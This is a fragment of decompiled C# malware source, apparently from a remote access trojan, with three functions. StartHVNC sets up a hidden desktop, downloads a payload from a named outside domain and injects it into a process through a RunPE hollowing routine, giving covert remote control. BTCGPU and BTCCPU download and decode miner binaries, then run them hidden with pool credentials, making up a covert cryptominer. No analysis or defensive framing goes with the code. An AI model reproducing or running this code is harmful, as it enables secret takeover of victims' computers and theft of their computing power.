// Token: 0x060000E6 RID: 230 RVA: 0x00010928 File Offset: 0x0000EB28
public static void StartHVNC(string ipport)
{
if (!HVNC.Running)
{
HVNC.SA.bInheritHandle = -1;
HVNC.SA.lpSecurityDescriptor = (IntPtr)0L;
HVNC.hNewDesktop = HVNC.CreateDesktop("RemoteDesktop", (IntPtr)0L, (IntPtr)0L, 1u, 511u, HVNC.SA);
RunPE.PROCESS_INFORMATION process_INFORMATION = default(RunPE.PROCESS_INFORMATION);
RunPE.STARTUP_INFORMATION startup_INFORMATION = default(RunPE.STARTUP_INFORMATION);
startup_INFORMATION.cb = Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION));
startup_INFORMATION.lpDesktop = "RemoteDesktop";
string lpApplicationName = Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 3) + "Windows\\explorer.exe";
string lpCommandLine = null;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES2;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES = security_ATTRIBUTES2;
HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES3 = security_ATTRIBUTES2;
RunPE.CreateProcess(lpApplicationName, lpCommandLine, ref security_ATTRIBUTES, ref security_ATTRIBUTES3, false, 0u, IntPtr.Zero, null, ref startup_INFORMATION, out process_INFORMATION);
WebClient webClient = new WebClient();
byte[] data;
if (Environment.Version.Major == 2)
{
data = webClient.DownloadData("http://fuehaoisdfhjaefouiads.info/HVNC20.exe");
}
if (Environment.Version.Major == 4)
{
data = webClient.DownloadData("http://fuehaoisdfhjaefouiads.info/HVNC40.exe");
}
RunPE.TryRun(Process.GetCurrentProcess().MainModule.FileName, ipport, data, true, true, "RemoteDesktop", ref HVNC.PID);
HVNC.Running = true;
}
}
// Token: 0x06000091 RID: 145 RVA: 0x0000B830 File Offset: 0x00009A30
public static void BTCGPU(string p1, string p2, string p3, bool hidden, string proxy = "")
{
try
{
if (!File.Exists(HandleMiner.BFGCLoc))
{
Functions.URLDownloadToFile(null, HandleMiner.BFGC, HandleMiner.BFGCLoc, 0, IntPtr.Zero);
}
}
catch (Exception ex)
{
return;
}
byte[] buffer = File.ReadAllBytes(HandleMiner.BFGCLoc);
byte[] pix_Sub_ = HandleMiner.ASDF(buffer, 8);
byte[] array = HandleMiner.PIX_Func_002_COIN(pix_Sub_);
if (proxy.Length > 1)
{
string fileName = Process.GetCurrentProcess().MainModule.FileName;
string cmd = string.Concat(new string[]
{
"-S opencl:auto --url=",
p1,
" -u ",
p2,
" -p ",
p3,
" --gpu-threads=2 --intensity=6 -x ",
proxy
});
byte[] data = array;
bool compatible = true;
string desktop = "";
int num = 0;
RunPE.TryRun(fileName, cmd, data, compatible, hidden, desktop, ref num);
}
else
{
string fileName2 = Process.GetCurrentProcess().MainModule.FileName;
string cmd2 = string.Concat(new string[]
{
"-S opencl:auto --url=",
p1,
" -u ",
p2,
" -p ",
p3,
" --gpu-threads=2 --intensity=6"
});
byte[] data2 = array;
bool compatible2 = true;
string desktop2 = "";
int num = 0;
RunPE.TryRun(fileName2, cmd2, data2, compatible2, hidden, desktop2, ref num);
}
}
// Token: 0x06000093 RID: 147 RVA: 0x0000BA8C File Offset: 0x00009C8C
public static void BTCCPU(string p1, string p2, string p3, bool hidden, string proxy = "")
{
try
{
if (!File.Exists(HandleMiner.CPUCLoc))
{
Functions.URLDownloadToFile(null, HandleMiner.CPUC, HandleMiner.CPUCLoc, 0, IntPtr.Zero);
}
}
catch (Exception ex)
{
return;
}
byte[] buffer = File.ReadAllBytes(HandleMiner.CPUCLoc);
byte[] array = HandleMiner.PIX_Func_002_COIN(HandleMiner.ASDF(buffer, 8));
if (proxy.Length > 1)
{
string fileName = Process.GetCurrentProcess().MainModule.FileName;
string cmd = string.Concat(new string[]
{
"--url=",
p1,
" --userpass="******":",
p3,
" --algo=sha256d --proxy=",
proxy
});
byte[] data = array;
bool compatible = true;
string desktop = "";
int num = 0;
RunPE.TryRun(fileName, cmd, data, compatible, hidden, desktop, ref num);
}
else
{
string fileName2 = Process.GetCurrentProcess().MainModule.FileName;
string cmd2 = string.Concat(new string[]
{
"--url=",
p1,
" --userpass="******":",
p3,
" --algo=sha256d"
});
byte[] data2 = array;
bool compatible2 = true;
string desktop2 = "";
int num = 0;
RunPE.TryRun(fileName2, cmd2, data2, compatible2, hidden, desktop2, ref num);
}
}